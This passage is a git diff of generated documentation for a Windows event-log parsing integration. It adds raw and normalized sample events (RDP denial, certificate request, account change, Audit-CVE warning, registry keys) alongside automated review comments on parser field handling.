@@ -843,6 +937,137 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "Event_4825_1.json" + + ```json + + { + "message": "{\n \"Hostname\": \"mars.example.org\",\n \"EventType\": \"AUDIT_FAILURE\",\n \"Severity\": \"ERROR\",\n \"EventID\": 4825,\n \"SourceName\": \"Microsoft-Windows-Security-Auditing\",\n \"ProcessID\": 632,\n \"Channel\": \"Security\",\n \"Message\": \"A user was denied the access to Remote Desktop. By default, users are allowed to connect only if they are members of the Remote Desktop Users group or Administrators group.\\r\\n\\r\\nSubject:\\r\\n\\tUser Name:\\tJDOE\\r\\n\\tDomain:\\t\\tEXAMPLE\\r\\n\\tLogon ID:\\t0xA360BC6B\\r\\n\\r\\nAdditional Information:\\r\\n\\tClient Address:\\t1.2.3.4\\r\\n\\r\\n\\r\\nThis event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\",\n \"Category\": \"Other Logon/Logoff Events\"\n}", + "event": { + "code": "4825", + "message": "A user was denied the access to Remote Desktop. By default, users are allowed to connect only if they are members of the Remote Desktop Users group or Administrators group.\r\n\r\nSubject:\r\n\tUser Name:\tJDOE\r\n\tDomain:\t\tEXAMPLE\r\n\tLogon ID:\t0xA360BC6B\r\n\r\nAdditional Information:\r\n\tClient Address:\t1.2.3.4\r\n\r\n\r\nThis event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.", + "outcome": "failure", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "action": { + "id": 4825, + "name": "A user was denied the access to Remote Desktop. 
By default, users are allowed to connect only if they are members of the Remote Desktop Users group or Administrators group", + "outcome": "failure", + "properties": { + "Category": "Other Logon/Logoff Events", + "EventType": "AUDIT_FAILURE", + "Severity": "ERROR", + "SourceName": "Microsoft-Windows-Security-Auditing" + }, + "type": "Security" + }, + "host": { + "hostname": "mars.example.org", + "name": "mars.example.org" + }, + "log": { + "hostname": "mars.example.org", + "level": "error" + }, + "os": { + "family": "windows", + "platform": "windows" + }, + "process": { + "id": 632, + "pid": 632 + }, + "related": { + "hosts": [ + "mars.example.org" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "JDOE" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "domain": "EXAMPLE", + "name": "JDOE" + } + } + + ``` + + +=== "Event_4886.json" + + ```json + + { + "message": "{\n \"EventTime\": \"2024-07-10 14:57:48\",\n \"Hostname\": \"FD001.example.org\",\n \"Keywords\": -9214364837600034816,\n \"EventType\": \"AUDIT_SUCCESS\",\n \"SeverityValue\": 2,\n \"Severity\": \"INFO\",\n \"EventID\": 4886,\n \"SourceName\": \"Microsoft-Windows-Security-Auditing\",\n \"ProviderGuid\": \"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\n \"Version\": 0,\n \"Task\": 12805,\n \"OpcodeValue\": 0,\n \"RecordNumber\": 4403229,\n \"ActivityID\": \"{47CB07C4-5532-467D-A89C-724B854B59F7}\",\n \"ProcessID\": 900,\n \"ThreadID\": 8040,\n \"Channel\": \"Security\",\n \"Message\": \"Certificate Services received a certificate request.\\r\\n\\t\\r\\nRequest ID:\\t2715945\\r\\nRequester:\\tEXAMPLE\\\\jdoe\\r\\nAttributes:\\t\\nCertificateTemplate:NDSEClient\\r\\n\\nccm:NDFR10923.example.org\",\n \"Category\": \"Certification Services\",\n \"Opcode\": \"Info\",\n \"RequestId\": \"2715945\",\n \"Requester\": \"EXAMPLE\\\\jdoe\",\n \"Attributes\": \"\\nCertificateTemplate:NDSEClient\\r\\n\\nccm:NDFR10923.example.org\",\n \"EventReceivedTime\": \"2024-07-10 14:57:50\",\n 
\"SourceModuleName\": \"SecurityLog\",\n \"SourceModuleType\": \"im_msvistalog\"\n}", + "event": { + "code": "4886", + "message": "Certificate Services received a certificate request.\r\n\t\r\nRequest ID:\t2715945\r\nRequester:\tEXAMPLE\\jdoe\r\nAttributes:\t\nCertificateTemplate:NDSEClient\r\n\nccm:NDFR10923.example.org", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "action": { + "id": 4886, + "name": "Certificate Services received a certificate request", + "outcome": "success", + "properties": { + "Attributes": "\nCertificateTemplate:NDSEClient\r\n\nccm:NDFR10923.example.org", + "Category": "Certification Services", + "EventType": "AUDIT_SUCCESS", + "Keywords": "-9214364837600034816", + "OpcodeValue": 0, + "ProviderGuid": "{54849625-5478-4994-A5BA-3E3B0328C30D}", + "Requester": "EXAMPLE\\jdoe", + "Severity": "INFO", + "SourceName": "Microsoft-Windows-Security-Auditing", + "Task": 12805 + }, + "record_id": 4403229, + "type": "Security" + }, + "host": { + "hostname": "FD001.example.org", + "name": "FD001.example.org" + }, + "log": { + "hostname": "FD001.example.org", + "level": "info" + }, + "os": { + "family": "windows", + "platform": "windows" + }, + "process": { + "id": 900, + "pid": 900, + "thread": { + "id": 8040 + } + }, + "related": { + "hosts": [ + "FD001.example.org" + ], + "user": [ + "jdoe" + ] + }, + "user": { + "domain": "EXAMPLE", + "name": "jdoe" + } + } + + ``` + + === "Event_4929.json" ```json @@ -1697,7 +1922,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "user": { "domain": "KEY", - "email": "firstname.lastname@example.org", "id": "S-1-5-21-0000000000-0000000000-0000000000-000000", "name": "" }, @@ -1782,7 +2006,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "user": { "domain": "KEY", - "email": "username@example.org", "id": "S-1-5-21-0000000000-0000000000-0000000000-000000", "name": "" }, 
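Review bot: `action.name` is truncated inconsistently in this hunk: for Event_4825_1.json it carries two sentences (`"A user was denied the access to Remote Desktop. By default, users are allowed to connect only if they are members of the Remote Desktop Users group or Administrators group"`), whereas Event_4738.json and Event_4886.json keep only the first sentence. The name appears to be cut at the first `\r\n` rather than at the first period; cutting at the period keeps `action.name` a short, stable label that rules can match exactly. Two more points on the same hunk: the Event_4886.json raw log carries `"RequestId": "2715945"`, but it is dropped from `action.properties` although `Requester` and `Attributes` are kept (and added to the field table); the request ID is what links a 4886 request to the corresponding issuance event (4887) for the same certificate, so keep it. `Attributes` also embeds the template name (`CertificateTemplate:NDSEClient`) inside a multi-line string, and the template name is the value an AD CS misuse rule pivots on, so a dedicated property for it would make it matchable without a regex. Finally, the Event_4825_1.json sample (and the @@ -830 Event_4768 hunk above, `"ip": ["1.1.1.1"]`) uses routable addresses as client IPs; the RFC 5737 documentation ranges (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24) avoid samples that point at real hosts.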
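Review bot: Removing `user.email` from these two samples (@@ -1697 and @@ -1782), together with the removal of the `user.email` row from the field table in the @@ -7280 hunk, is a breaking change for any custom rule or saved query that filters on `user.email` for this integration. If the address was being synthesized rather than extracted from the event, dropping it is the right call, but the removal should be called out in the release notes so rule authors can migrate to `user.name` / `user.id`.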
@@ -1803,6 +2026,72 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "audit_cve.json" + + ```json + + { + "message": "{\"EventTime\":\"2024-07-06 02:20:36\",\"Hostname\":\"srv023.example.com\",\"Keywords\":-9223372036854775808,\"EventType\":\"WARNING\",\"SeverityValue\":3,\"Severity\":\"WARNING\",\"EventID\":1,\"SourceName\":\"Microsoft-Windows-Audit-CVE\",\"ProviderGuid\":\"{85A62A0D-7E17-485F-9D4F-749A287193A6}\",\"Version\":0,\"Task\":0,\"OpcodeValue\":0,\"RecordNumber\":606266,\"ProcessID\":2392,\"ThreadID\":2932,\"Channel\":\"Application\",\"Domain\":\"AUTORITE NT\",\"AccountName\":\"System\",\"UserID\":\"S-1-5-18\",\"AccountType\":\"User\",\"Message\":\"D\u00e9tection possible de CVE : [CVE-2020-158] cert chain exceeded limit\\r\\nInformations suppl\u00e9mentaires : Cert: sha1: ADC83B19E793491B1C6EA0FD8B46CD9F32E592FC IssuerDepthCount: 13 Limit: 12\\r\\n\\r\\nCet \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 lorsqu\u2019une tentative d\u2019exploitation d\u2019une vuln\u00e9rabilit\u00e9 connue ([CVE-2020-158] cert chain exceeded limit) est d\u00e9tect\u00e9e.\\r\\nCet \u00e9v\u00e9nement est d\u00e9clench\u00e9 par un processus en mode utilisateur.\\r\\n\",\"Opcode\":\"Informations\",\"CVEID\":\"[CVE-2020-158] cert chain exceeded limit\",\"AdditionalDetails\":\"Cert: <CS.EXAMPLE.ORG> sha1: ADC83B19E793491B1C6EA0FD8B46CD9F32E592FC IssuerDepthCount: 13 Limit: 12\",\"EventReceivedTime\":\"2024-07-06 02:20:37\",\"SourceModuleName\":\"eventlogs\",\"SourceModuleType\":\"im_msvistalog\"}\n", + "event": { + "code": "1", + "message": "D\u00e9tection possible de CVE : [CVE-2020-158] cert chain exceeded limit\r\nInformations suppl\u00e9mentaires : Cert: sha1: ADC83B19E793491B1C6EA0FD8B46CD9F32E592FC IssuerDepthCount: 13 Limit: 12\r\n\r\nCet \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 lorsqu\u2019une tentative d\u2019exploitation d\u2019une vuln\u00e9rabilit\u00e9 connue ([CVE-2020-158] cert chain exceeded limit) est 
d\u00e9tect\u00e9e.\r\nCet \u00e9v\u00e9nement est d\u00e9clench\u00e9 par un processus en mode utilisateur.\r\n", + "provider": "Microsoft-Windows-Audit-CVE" + }, + "action": { + "id": 1, + "properties": { + "AccountName": "System", + "AccountType": "User", + "CVEID": "[CVE-2020-158] cert chain exceeded limit", + "Domain": "AUTORITE NT", + "EventType": "WARNING", + "Keywords": "-9223372036854775808", + "OpcodeValue": 0, + "ProviderGuid": "{85A62A0D-7E17-485F-9D4F-749A287193A6}", + "Severity": "WARNING", + "SourceName": "Microsoft-Windows-Audit-CVE", + "Task": 0 + }, + "record_id": 606266, + "type": "Application" + }, + "host": { + "hostname": "srv023.example.com", + "name": "srv023.example.com" + }, + "log": { + "hostname": "srv023.example.com", + "level": "warning" + }, + "os": { + "family": "windows", + "platform": "windows" + }, + "process": { + "id": 2392, + "pid": 2392, + "thread": { + "id": 2932 + } + }, + "related": { + "hosts": [ + "srv023.example.com" + ], + "user": [ + "System" + ] + }, + "user": { + "domain": "AUTORITE NT", + "id": "S-1-5-18", + "name": "System" + } + } + + ``` + + === "bits-file-transfert.json" ```json @@ -2595,6 +2884,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "Severity": "INFO", "SourceName": "Microsoft-Windows-Security-Auditing", "TargetDomainName": "AD", + "TargetLogonId": "0x3912391a", "TargetUserName": "USERFOO", "TargetUserSid": "S-1-5-21-1519513455-2607746426-4144247390-71234", "Task": 12545 @@ -2681,6 +2971,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "SubjectUserName": "-", "SubjectUserSid": "S-1-0-0", "TargetDomainName": "KEY", + "TargetLogonId": "0xfbee0744", "TargetUserName": "SVC_DD_SP-SEARCH", "TargetUserSid": "S-1-5-21-1574594750-1263408776-2012955550-69701", "Task": 12544, 
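Review bot: The audit_cve.json sample drops the raw `AdditionalDetails` field (`Cert: <CS.EXAMPLE.ORG> sha1: ADC83B19E793491B1C6EA0FD8B46CD9F32E592FC IssuerDepthCount: 13 Limit: 12`) from `action.properties` while keeping `CVEID`; the certificate thumbprint and the issuer depth are the only details that let an analyst identify the offending chain, so keep it next to `CVEID`. `event.outcome` and `action.name` are also absent here although the Security-Auditing samples in this patch set both; if nothing can be derived for the `Microsoft-Windows-Audit-CVE` provider (the sample only has `EventType: WARNING`), the integration notes should say so rather than leaving rule authors to guess.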
@@ -2788,6 +3079,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "SubjectUserName": "PCFOO$", "SubjectUserSid": "S-1-5-18", "TargetDomainName": "AUTORITE NT", + "TargetLogonId": "0x7e767bc", "TargetOutboundDomainName": "FOOBAR", "TargetOutboundUserName": "svc_admin_sccm", "TargetUserName": "Syst\u00e8me", @@ -2889,6 +3181,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "Severity": "INFO", "SourceName": "Microsoft-Windows-Security-Auditing", "TargetDomainName": "AD", + "TargetLogonId": "0x3912391a", "TargetUserName": "USERFOO", "TargetUserSid": "S-1-5-21-1519513455-2607746426-4144247390-71234", "Task": 12545 @@ -3144,6 +3437,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "SubjectUserName": "adm_FOOBAZ", "SubjectUserSid": "S-1-5-21-1574594750-1263408776-2012955550-122301", "TargetDomainName": "-", + "TargetLogonId": "0x0", "TargetUserName": "-", "TargetUserSid": "S-1-0-0", "Task": 13312 @@ -3167,6 +3461,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "executable": "C:\\Windows\\System32\\wbem\\WMIC.exe", "id": 11260, "name": "WMIC.exe", + "parent": { + "pid": 4 + }, "pid": 11260, "thread": { "id": 13732 @@ -3348,6 +3645,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "Domain": "NT AUTHORITY", "EventType": "VERBOSE", "Keywords": "0", + "MessageNumber": "1", + "MessageTotal": "1", "OpcodeValue": 15, "ProviderGuid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}", "ScriptBlockId": "592078b2-e981-40be-a166-10896495067b", @@ -4038,6 +4337,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "SubjectUserName": "REDACTED", "SubjectUserSid": "S-1-5-18", "TargetDomainName": "-", + "TargetLogonId": "0x0", "TargetUserName": "-", "TargetUserSid": "S-1-0-0", "Task": 13312 
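Review bot: Good addition in the @@ -3348 hunk, with one thing to document: `MessageNumber` / `MessageTotal` are the chunk index and chunk count of a script block that the provider split across several events, and they are emitted as strings (`"1"`) like the other properties. A rule that matches script-block content only sees one chunk per event, so a pattern spanning a chunk boundary is missed; analysts need these two fields plus `ScriptBlockId` to reassemble the full block. If rows for them are not already in the field table, add them beside the `NewUAC` / `OldUAC` rows added in the @@ -7199 hunk.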
@@ -4066,6 +4366,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "command_line": "C:\\Windows\\System32\\svchost.exe", "executable": "C:\\Windows\\System32\\svchost.exe", "name": "svchost.exe", + "pid": 4, "working_directory": "C:\\Windows\\System32\\" }, "pid": 3648, @@ -4335,6 +4636,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "EventType": "AUDIT_SUCCESS", "HomeDirectory": "-", "Keywords": "-9214364837600034816", + "NewUAC": "0x15", + "OldUAC": "0x0", "OpcodeValue": 0, "PrivilegeList": "-", "ProviderGuid": "{54849625-5478-4994-A5BA-3E3B0328C30D}", @@ -4875,6 +5178,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "SubjectUserName": "HOSTFOOBAR", "SubjectUserSid": "S-1-5-18", "TargetDomainName": "-", + "TargetLogonId": "0x0", "TargetUserName": "-", "TargetUserSid": "S-1-0-0", "Task": 13312 @@ -4903,6 +5207,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "command_line": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "name": "powershell.exe", + "pid": 4, "working_directory": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" }, "pid": 3920, @@ -4959,6 +5264,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "SubjectUserName": "USERFOO", "SubjectUserSid": "S-1-5-21-1574594750-1263408776-2012955550-78445", "TargetDomainName": "-", + "TargetLogonId": "0x0", "TargetUserName": "-", "TargetUserSid": "S-1-0-0", "Task": 13312 
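Review bot: The `TargetLogonId` values added in the @@ -3144, @@ -4038, @@ -4875 and @@ -4959 hunks are all `"0x0"`, on events with `Task: 13312` and `TargetUserSid: "S-1-0-0"`; there `0x0` is a legitimate value (no target logon session), not a missing field, so the parser should keep emitting it rather than dropping it as empty, and rule authors should not treat it as null. For the logon-category hunks (@@ -2595, @@ -2681, @@ -2788, @@ -3181) the value (`0x3912391a`, `0xfbee0744`, `0x7e767bc`) is the session identifier that joins a logon to its later logoff and privilege-assignment events, so it deserves a row in the field table in the same way as `NewUAC` / `OldUAC`.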
@@ -4987,6 +5293,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "command_line": "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "executable": "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "name": "chrome.exe", + "pid": 4, "working_directory": "C:\\Program Files (x86)\\Google\\Chrome\\Application\\" }, "pid": 5004, @@ -5076,7 +5383,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "registry": { "hive": "HKU", - "key": "\\S-1-5-21-375581984-207109644-1491462053-1001\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.MicrosoftOfficeHub_18.2008.12711.0_x64__8wekyb3d8bbwe\\\\LocalBridge.exe", + "key": "\\S-1-5-21-375581984-207109644-1491462053-1001\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.MicrosoftOfficeHub_18.2008.12711.0_x64__8wekyb3d8bbwe\\", "path": "HKU\\\\S-1-5-21-375581984-207109644-1491462053-1001\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.MicrosoftOfficeHub_18.2008.12711.0_x64__8wekyb3d8bbwe\\\\LocalBridge.exe", "value": "LocalBridge.exe" }, @@ -5637,7 +5944,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "type": "REG_DWORD" }, "hive": "HKLM", - "key": "System\\CurrentControlSet\\Control\\Lsa\\nolmhash", + "key": "System\\CurrentControlSet\\Control\\Lsa", "path": "HKLM\\System\\CurrentControlSet\\Control\\Lsa\\nolmhash", "value": "nolmhash" }, 
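Review bot: `process.parent.pid` is `4` in every sample where this patch adds it (@@ -3167, @@ -4066, @@ -4903, @@ -4987 here, and @@ -7040, @@ -7110 further on), including the @@ -4987 hunk where the parent `executable` is `chrome.exe` and the @@ -4066 hunk where it is `svchost.exe`. On Windows PID 4 is the System process, so a chrome.exe or svchost.exe parent with PID 4 cannot come from a real event; please check whether the parser reads the correct source field or defaults to 4 when it is absent. If it is a default it has to go: a rule that uses the parent PID to join a child to its parent's process-creation event will silently match the wrong process.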
@@ -5726,7 +6033,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "type": "REG_SZ" }, "hive": "HKLM", - "key": "System\\CurrentControlSet\\services\\NAVENG\\ImagePath", + "key": "System\\CurrentControlSet\\services\\NAVENG", "path": "HKLM\\System\\CurrentControlSet\\services\\NAVENG\\ImagePath", "value": "ImagePath" }, @@ -7040,6 +7347,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "executable": "C:\\Windows\\System32\\qwinsta.exe", "id": 12980, "name": "qwinsta.exe", + "parent": { + "pid": 4 + }, "pid": 12980, "thread": { "id": 92 @@ -7110,6 +7420,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "executable": "C:\\Windows\\System32\\conhost.exe", "id": 4380, "name": "conhost.exe", + "parent": { + "pid": 4 + }, "pid": 4380, "thread": { "id": 88 @@ -7178,6 +7491,7 @@ The following table lists the fields that are extracted, normalized under the EC |`action.properties.Accesses` | `keyword` | | |`action.properties.AdditionalActionsID` | `keyword` | | |`action.properties.AdditionalActionsString` | `keyword` | | +|`action.properties.Attributes` | `keyword` | | |`action.properties.BytesTotal` | `keyword` | | |`action.properties.ConfigurationFile` | `keyword` | | |`action.properties.Content` | `keyword` | | 
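Review bot: Moving the value name out of `registry.key` (@@ -5076, @@ -5637, @@ -5726) is the right split, since `registry.value` already holds the name and `registry.path` keeps the full path, but the results are not normalized the same way: the HKLM keys end in the last key component (`System\\CurrentControlSet\\Control\\Lsa`, `System\\CurrentControlSet\\services\\NAVENG`) while the HKU key keeps a trailing separator (`...8wekyb3d8bbwe\\"`) and doubled separators (`\\\\Software\\\\Microsoft`). Rules match `registry.key` exactly or by suffix, so strip the trailing separator and collapse the escaped separators consistently before this ships, otherwise the same key can appear in two spellings.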
@@ -7199,12 +7513,15 @@ The following table lists the fields that are extracted, normalized under the EC |`action.properties.LastQuickScanAge` | `keyword` | | |`action.properties.MessEventType` | `keyword` | | |`action.properties.New Value` | `keyword` | | +|`action.properties.NewUAC` | `keyword` | | |`action.properties.NewValue` | `keyword` | | |`action.properties.Old Value` | `keyword` | | +|`action.properties.OldUAC` | `keyword` | | |`action.properties.ParentImage` | `keyword` | | |`action.properties.ProcessName` | `keyword` | | |`action.properties.ProxyServer` | `keyword` | | |`action.properties.ReferrerUrl` | `keyword` | | +|`action.properties.Requester` | `keyword` | | |`action.properties.SentUpdateServer` | `keyword` | | |`action.properties.ServiceFileName` | `keyword` | | |`action.properties.StartFunction` | `keyword` | | @@ -7257,6 +7574,7 @@ The following table lists the fields that are extracted, normalized under the EC |`process.parent.command_line` | `wildcard` | Full command line that started the process. | |`process.parent.executable` | `keyword` | Absolute path to the process executable. | |`process.parent.name` | `keyword` | Process name. | +|`process.parent.pid` | `long` | Process id. | |`process.parent.working_directory` | `keyword` | The working directory of the process. | |`process.pid` | `long` | Process id. | |`process.ppid` | `integer` | | @@ -7280,7 +7598,6 @@ The following table lists the fields that are extracted, normalized under the EC |`url.path` | `wildcard` | Path of the request, such as "/search". | |`url.scheme` | `keyword` | Scheme of the url. | |`user.domain` | `keyword` | Name of the directory the user is a member of. | -|`user.email` | `keyword` | User email address. | |`user.id` | `keyword` | Unique identifier of the user. | |`user.name` | `keyword` | Short name or login of the user. | |`user.target.domain` | `keyword` | Name of the directory the user is a member of. | 
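Review bot: The field table now lists two fields for the parent process id with different types: the new `process.parent.pid` (`long`) and the existing `process.ppid` (`integer`). State which one is canonical (ECS uses `process.parent.pid`) and either mark `process.ppid` deprecated or document both as aliases, so rule authors do not build on the one that will be dropped. Also, `action.properties.RequestId` is not added although the Event_4886.json sample carries it in the raw log, and no rows for `TargetLogonId`, `MessageNumber` or `MessageTotal` appear in these hunks even though the samples above now emit them; if they are not already in the table, add them.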
diff --git a/_shared_content/operations_center/integrations/generated/9281438c-f7c3-4001-9bcc-45fd108ba1be_sample.md b/_shared_content/operations_center/integrations/generated/9281438c-f7c3-4001-9bcc-45fd108ba1be_sample.md index a6f6c67327..12f07bd4b9 100644 --- a/_shared_content/operations_center/integrations/generated/9281438c-f7c3-4001-9bcc-45fd108ba1be_sample.md +++ b/_shared_content/operations_center/integrations/generated/9281438c-f7c3-4001-9bcc-45fd108ba1be_sample.md 
@@ -351,6 +351,64 @@ In this section, you will find examples of raw logs as generated natively by the +=== "Event_4738" + + ``` + { + "EventTime": "2024-05-06 11:38:15", + "Hostname": "server01.example.org", + "Keywords": -9214364837600034816, + "EventType": "AUDIT_SUCCESS", + "SeverityValue": 2, + "Severity": "INFO", + "EventID": 4738, + "SourceName": "Microsoft-Windows-Security-Auditing", + "ProviderGuid": "{54849625-5478-4994-A5BA-3E3B0328C30D}", + "Version": 0, + "Task": 13824, + "OpcodeValue": 0, + "RecordNumber": 105098604, + "ProcessID": 688, + "ThreadID": 2676, + "Channel": "Security", + "Message": "A user account was changed.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-7\r\n\tAccount Name:\t\tANONYMOUS LOGON\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E6\r\n\r\nTarget Account:\r\n\tSecurity ID:\t\tS-1-5-21-1111111111-222222222-444444444-55555\r\n\tAccount Name:\t\tjdoe\r\n\tAccount Domain:\t\tEXAMPLE\r\n\r\nChanged Attributes:\r\n\tSAM Account Name:\t-\r\n\tDisplay Name:\t\t-\r\n\tUser Principal Name:\t-\r\n\tHome Directory:\t\t-\r\n\tHome Drive:\t\t-\r\n\tScript Path:\t\t-\r\n\tProfile Path:\t\t-\r\n\tUser Workstations:\t-\r\n\tPassword Last Set:\t06.05.2024 11:38:15\r\n\tAccount Expires:\t\t-\r\n\tPrimary Group ID:\t-\r\n\tAllowedToDelegateTo:\t-\r\n\tOld UAC Value:\t\t-\r\n\tNew UAC Value:\t\t-\r\n\tUser Account Control:\t-\r\n\tUser Parameters:\t-\r\n\tSID History:\t\t-\r\n\tLogon Hours:\t\t-\r\n\r\nAdditional Information:\r\n\tPrivileges:\t\t-", + "Category": "User Account Management", + "Opcode": "Info", + "Dummy": "-", + "TargetUserName": "jdoe", + "TargetDomainName": "EXAMPLE", + "TargetSid": "S-1-5-21-1111111111-222222222-444444444-55555", + "SubjectUserSid": "S-1-5-7", + "SubjectUserName": "ANONYMOUS LOGON", + "SubjectDomainName": "NT AUTHORITY", + "SubjectLogonId": "0x3e6", + "PrivilegeList": "-", + "SamAccountName": "-", + "DisplayName": "-", + "UserPrincipalName": "-", + "HomeDirectory": "-", + "HomePath": "-", + "ScriptPath": 
"-", + "ProfilePath": "-", + "UserWorkstations": "-", + "PasswordLastSet": "06.05.2024 11:38:15", + "AccountExpires": "-", + "PrimaryGroupId": "-", + "AllowedToDelegateTo": "-", + "OldUacValue": "321", + "NewUacValue": "123", + "UserAccountControl": "-", + "UserParameters": "-", + "SidHistory": "-", + "LogonHours": "-", + "EventReceivedTime": "2024-05-06 11:38:16", + "SourceModuleName": "SecurityLog", + "SourceModuleType": "im_msvistalog" + } + ``` + + + === "Event_4768" ``` 
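Review bot: The new raw-sample tabs in this file (`Event_4738` here, and `Event_4825_1`, `Event_4886`, `audit_cve` in the following hunks) open with a bare three-backtick fence, whereas the Trellix raw sample added later in this patch (`alert_event_1`) uses a fence tagged `json`; the content is JSON in both cases, so the sample generator should tag the fence consistently. The Event_4738 raw sample also carries the same `"OldUacValue": "321"` / `"NewUacValue": "123"` placeholders as the transformed sample, so replacing the source event fixes both files at once.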
@@ -431,6 +489,59 @@ In this section, you will find examples of raw logs as generated natively by the +=== "Event_4825_1" + + ``` + { + "Hostname": "mars.example.org", + "EventType": "AUDIT_FAILURE", + "Severity": "ERROR", + "EventID": 4825, + "SourceName": "Microsoft-Windows-Security-Auditing", + "ProcessID": 632, + "Channel": "Security", + "Message": "A user was denied the access to Remote Desktop. By default, users are allowed to connect only if they are members of the Remote Desktop Users group or Administrators group.\r\n\r\nSubject:\r\n\tUser Name:\tJDOE\r\n\tDomain:\t\tEXAMPLE\r\n\tLogon ID:\t0xA360BC6B\r\n\r\nAdditional Information:\r\n\tClient Address:\t1.2.3.4\r\n\r\n\r\nThis event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.", + "Category": "Other Logon/Logoff Events" + } + ``` + + + +=== "Event_4886" + + ``` + { + "EventTime": "2024-07-10 14:57:48", + "Hostname": "FD001.example.org", + "Keywords": -9214364837600034816, + "EventType": "AUDIT_SUCCESS", + "SeverityValue": 2, + "Severity": "INFO", + "EventID": 4886, + "SourceName": "Microsoft-Windows-Security-Auditing", + "ProviderGuid": "{54849625-5478-4994-A5BA-3E3B0328C30D}", + "Version": 0, + "Task": 12805, + "OpcodeValue": 0, + "RecordNumber": 4403229, + "ActivityID": "{47CB07C4-5532-467D-A89C-724B854B59F7}", + "ProcessID": 900, + "ThreadID": 8040, + "Channel": "Security", + "Message": "Certificate Services received a certificate request.\r\n\t\r\nRequest ID:\t2715945\r\nRequester:\tEXAMPLE\\jdoe\r\nAttributes:\t\nCertificateTemplate:NDSEClient\r\n\nccm:NDFR10923.example.org", + "Category": "Certification Services", + "Opcode": "Info", + "RequestId": "2715945", + "Requester": "EXAMPLE\\jdoe", + "Attributes": "\nCertificateTemplate:NDSEClient\r\n\nccm:NDFR10923.example.org", + "EventReceivedTime": "2024-07-10 14:57:50", + "SourceModuleName": "SecurityLog", + "SourceModuleType": "im_msvistalog" + } + ``` + + + 
=== "Event_4929" ``` @@ -976,6 +1087,42 @@ In this section, you will find examples of raw logs as generated natively by the +=== "audit_cve" + + ``` + { + "EventTime": "2024-07-06 02:20:36", + "Hostname": "srv023.example.com", + "Keywords": -9223372036854775808, + "EventType": "WARNING", + "SeverityValue": 3, + "Severity": "WARNING", + "EventID": 1, + "SourceName": "Microsoft-Windows-Audit-CVE", + "ProviderGuid": "{85A62A0D-7E17-485F-9D4F-749A287193A6}", + "Version": 0, + "Task": 0, + "OpcodeValue": 0, + "RecordNumber": 606266, + "ProcessID": 2392, + "ThreadID": 2932, + "Channel": "Application", + "Domain": "AUTORITE NT", + "AccountName": "System", + "UserID": "S-1-5-18", + "AccountType": "User", + "Message": "D\u00e9tection possible de CVE : [CVE-2020-158] cert chain exceeded limit\r\nInformations suppl\u00e9mentaires : Cert: sha1: ADC83B19E793491B1C6EA0FD8B46CD9F32E592FC IssuerDepthCount: 13 Limit: 12\r\n\r\nCet \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 lorsqu\u2019une tentative d\u2019exploitation d\u2019une vuln\u00e9rabilit\u00e9 connue ([CVE-2020-158] cert chain exceeded limit) est d\u00e9tect\u00e9e.\r\nCet \u00e9v\u00e9nement est d\u00e9clench\u00e9 par un processus en mode utilisateur.\r\n", + "Opcode": "Informations", + "CVEID": "[CVE-2020-158] cert chain exceeded limit", + "AdditionalDetails": "Cert: <CS.EXAMPLE.ORG> sha1: ADC83B19E793491B1C6EA0FD8B46CD9F32E592FC IssuerDepthCount: 13 Limit: 12", + "EventReceivedTime": "2024-07-06 02:20:37", + "SourceModuleName": "eventlogs", + "SourceModuleType": "im_msvistalog" + } + ``` + + + === "bits-file-transfert" ``` diff --git 